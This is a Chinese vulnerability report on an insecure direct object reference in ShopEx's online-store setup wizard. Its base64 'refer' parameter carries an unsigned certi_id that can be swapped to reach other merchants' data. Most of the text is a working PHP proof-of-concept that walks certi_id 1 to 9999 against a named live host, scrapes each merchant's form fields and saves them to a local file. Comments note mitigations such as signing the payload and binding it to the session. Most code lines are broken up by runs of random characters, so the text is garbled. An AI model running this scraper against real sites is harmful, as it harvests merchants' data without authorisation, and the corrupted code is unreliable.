|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 经 base64 解码为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}.
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
// Proof-of-concept reproduced from the report. step2.php reads a
// client-supplied certi_id out of the base64 "refer" query parameter and
// renders that merchant's pre-filled wizard form without checking that the
// caller is entitled to it (an IDOR). base64 is an encoding, not
// encryption or authentication, so nothing here stops the value from being
// substituted. Server-side mitigation: bind certi_id to the authenticated
// session, or sign the refer payload (HMAC + expiry) and reject any
// mismatch; additionally rate-limit step2.php and alert on a single source
// requesting sequential certi_id values.
& m( V) \$ J K/ [9 ^& r, ^9 F7 t+ r+ ~8 k0 X5 @
// Sequential ids 1..9999 — exactly the access pattern server logs should flag.
for ($i=1; $i < 10000; $i++) { // iterate
6 G% t G) h" @1 o/ R5 Q+ m7 m5 b; A# n. f9 [
ShowshopExD($i);
" ^* S* ~5 I$ m. F) P
- {5 j( H7 ~, ~! L& f }4 q$ V$ T' F: \% i/ d4 F- [4 G
// Fetches the wizard page for one certi_id and records any text-input
// name:value pairs it contains. $cid: the certi_id to query (cast with intval).
, j% M2 E+ ^ T: Y% C function ShowshopExD($cid) {
$ v* q- l& w3 W( v- t: T7 y
// The setup-wizard step that renders the merchant form.
0 t0 T2 S) x; r4 e8 t) c0 k $url='http://guide.ecos.shopex.cn/step2.php';
: F- M/ G/ j u
// The refer payload carries no signature, nonce or session binding, so the
// server cannot distinguish this from a legitimate wizard redirect.
9 L C: A+ o5 N% g# `, }1 N $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');$ p9 f. P( C' U; _3 l- h
" N T" T4 G5 ~% @! R, N $url = $url.'?refer='.$refer;
8 Z* P3 T: o6 K; c/ K9 n/ s4 q' v5 c% ~
$ch = curl_init($url);" l V" k7 S( {0 K: [
/ M9 R. P: M" Q7 O- A5 _ curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
- O! |. l3 @, X- V" k7 F4 q: j& ?+ Y4 v
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;4 E& p' e- s: ?) E/ v
2 }3 a8 u, J3 C& C1 H) I $result = curl_exec($ch);0 V: d& ?. m* M9 Y* G
// Re-encodes the response body from UTF-8 to GB2312.
( {; A/ d$ v; `, V $result = mb_convert_encoding($result, "gb2312", "UTF-8");
& W% A+ V4 i8 m) Q# h6 ? ]% ^# N; n- l4 p1 @& I# w/ x
// A hit is assumed when the page echoes the refer value back.
if(strpos($result,$refer))
6 _! U6 N" l& U* u4 u- w5 }
& m$ P* r: q; k1 T$ t3 F# X {; T9 O! Q! Q4 g4 l
7 _9 j6 S, q! y: R
$fp = fopen("c:/shopEx.txt",'ab'); // save to file (append mode)
// Pulls every <input type="text" .../> element out of the returned HTML.
+ y1 j" H1 g! K/ }! ^ f3 E) p preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);7 h& Z+ o- Q. k/ v! s+ m
3 U6 g1 X* _9 F1 N1 m9 [# R0 f% n3 S
foreach ($value[1] as $key) {* p! F2 @$ H" b( ?1 S: N
// name and value attributes of each field; one "name:value" line per input.
( s& G: b- p) m% D( n preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);( i5 j% b: G1 D: B ^
& |) R. E$ A4 R R; R- E7 X! _ echo $res[1][0].':'.$res[3][0]."\r\n";2 h9 [2 y% l4 r* R( R+ w
. U/ u' e9 u+ N, E
$col =$res[1][0].':'.$res[3][0]."\r\n"; c$ |" Q; V. u- }- v; F c" U
$ z* r6 u9 M% R, g) V1 h
fwrite($fp, $col, strlen($col));
0 B, u8 i" W2 o% r" w2 U" L
5 U+ m7 o& W0 q" t4 O2 T }' f& s$ h- @& u3 P! Z6 u5 H; Y
1 A( r/ T; v6 Y3 w m echo '--------------------------------'."\r\n";+ ~6 \- Y: [. c2 u
" }" A _% f7 H" ]& I% f# e
fclose($fp);
: [+ {6 \- j/ `/ k8 B W A* M
1 C" r$ x5 u" P4 K: `1 T" @3 } }5 S! q B2 {1 @% o! f9 d' \4 B3 C$ w
0 ?6 P0 \* K# o( t1 F flush();
. X6 Q+ i( g- `8 x7 Y4 F+ f6 ^
- B( G7 z J" t$ Q curl_close($ch);. m n4 u; |4 b, U: m6 t
0 A. M; w/ R/ _6 S
}
+ ^, y9 p( L- m9 @( w5 C. |) a" F l$ v% K
?>0 t! m. S6 j' p& K8 g' X( u S
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式
|